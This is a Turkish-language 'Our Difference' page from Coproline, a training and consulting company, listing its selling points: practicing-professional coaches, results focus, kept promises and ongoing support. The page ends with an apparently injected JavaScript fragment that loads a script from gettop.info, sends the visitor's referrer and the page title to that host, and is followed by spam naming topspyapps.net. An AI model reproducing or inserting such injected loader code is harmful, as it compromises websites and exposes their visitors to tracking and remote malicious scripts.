Farkımız | Coproline

Anlattığımızı Yapar, Yaptığımızı Anlatırız

Tüm Coproline eğitim koçları (CoproCoach) aktif çalışma hayatı devam eden sektör profesyonellerinden oluşur. Bu da eğitim ve danışmanlık hizmetlerimizi sunarken güncel tecrübelerimizden yola çıkmamıza ve işin bizzat uygulayıcıları olarak müşterilerimize ‘koçluk’ yapmamıza imkân tanır.

  • En büyük farkımız eğitim ve danışmanlık çalışmalarımızı ‘sonuç odaklı’ sunmamızdır. İster bir girişimci olun, ister bir KOBİ sahibi ya da Büyük Ölçekli Şirket temsilcisi, biz size sonuç aldırmak üzere çalışır ve bu odakta hizmet sunarız. Geri kalan her şey bizim için ikinci planda gelir.
  • Verdiğimiz tüm vaatleri yerine getirir, sözlerimizi tutarız.
  • Eğitim ve danışmanlık hizmetlerimiz sonrasında da müşterilerimiz ile düzenli temasımızı korur, gerektiğinde destek sağlarız.
  • Eğitimlerde tüm bilgiler eksiksiz ve modern iş simülasyonları eşliğinde uygulamalı olarak öğretilir ve konular nöro-psikolojik yöntemlerle akılda kalıcı hale getirilir.
  • Coproline ArGe’si sürekli olarak güncel kaynakları araştırarak danışmanlık çalışmalarını ve eğitim programlarını geliştirir. Müşterilerimiz eğitim ve danışmanlık çalışmalarımızda en güncel kaynak ve yöntemlerden faydalandırılır.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.nettopspyapps.net